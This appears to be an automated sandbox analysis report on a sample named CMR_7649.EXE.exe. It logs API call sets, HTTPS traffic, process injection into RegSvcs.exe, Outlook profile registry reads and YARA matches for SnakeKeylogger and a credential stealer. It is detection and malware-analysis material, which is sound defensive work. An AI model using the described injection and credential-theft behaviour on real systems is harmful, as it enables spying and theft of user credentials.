                  Source: RegSvcs.exe, 00000001.00000002.4111428677.0000000004310000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004049000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000041ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: RegSvcs.exe, 00000001.00000002.4110039811.0000000003184000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003175000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000001.00000002.4110039811.000000000317F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49747 version: TLS 1.2
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: CMR_7649.EXE.exe PID: 6888, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 3152, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004096A00_2_004096A0
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0042200C0_2_0042200C
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0041A2170_2_0041A217
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004122160_2_00412216
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0042435D0_2_0042435D
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004033C00_2_004033C0
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0044F4300_2_0044F430
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004125E80_2_004125E8
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0044663B0_2_0044663B
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004138010_2_00413801
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0042096F0_2_0042096F
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004129D00_2_004129D0
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004119E30_2_004119E3
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0041C9AE0_2_0041C9AE
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0047EA6F0_2_0047EA6F
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0040FA100_2_0040FA10
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0044EB590_2_0044EB59
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00423C810_2_00423C81
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00411E780_2_00411E78
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00442E0C0_2_00442E0C
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00420EC00_2_00420EC0
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0044CF170_2_0044CF17
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00444FD20_2_00444FD2
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_03EDF6300_2_03EDF630
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013971181_2_01397118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0139C1471_2_0139C147
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0139A0881_2_0139A088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013953621_2_01395362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0139D2781_2_0139D278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0139C4681_2_0139C468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0139C7381_2_0139C738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013969A01_2_013969A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0139E9881_2_0139E988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0139CA081_2_0139CA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01393AA11_2_01393AA1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0139CCD81_2_0139CCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0139CFAA1_2_0139CFAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0139F6311_2_0139F631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0139E97A1_2_0139E97A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013939F01_2_013939F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013929EC1_2_013929EC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0139FA881_2_0139FA88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01393E091_2_01393E09
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: String function: 004115D7 appears 36 times
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: String function: 00416C70 appears 39 times
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: String function: 00445AE0 appears 65 times
                  Source: CMR_7649.EXE.exe, 00000000.00000003.1689258711.000000000489D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CMR_7649.EXE.exe
                  Source: CMR_7649.EXE.exe, 00000000.00000003.1687634167.00000000046F3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CMR_7649.EXE.exe
                  Source: CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs CMR_7649.EXE.exe
                  Source: CMR_7649.EXE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: CMR_7649.EXE.exe PID: 6888, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 3152, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, -U.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\savagerJump to behavior
                  Source: CMR_7649.EXE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: CMR_7649.EXE.exeReversingLabs: Detection: 28%
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeFile read: C:\Users\user\Desktop\CMR_7649.EXE.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\CMR_7649.EXE.exe "C:\Users\user\Desktop\CMR_7649.EXE.exe"
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\CMR_7649.EXE.exe"
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\CMR_7649.EXE.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: CMR_7649.EXE.exeStatic file information: File size 1237203 > 1048576
                  Source: Binary string: wntdll.pdbUGP source: CMR_7649.EXE.exe, 00000000.00000003.1689749909.0000000004770000.00000004.00001000.00020000.00000000.sdmp, CMR_7649.EXE.exe, 00000000.00000003.1689561661.00000000045D0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: CMR_7649.EXE.exe, 00000000.00000003.1689749909.0000000004770000.00000004.00001000.00020000.00000000.sdmp, CMR_7649.EXE.exe, 00000000.00000003.1689561661.00000000045D0000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                  Source: CMR_7649.EXE.exeStatic PE information: real checksum: 0xa961f should be: 0x12e812
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00462463 push edi; ret 0_2_00462465
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
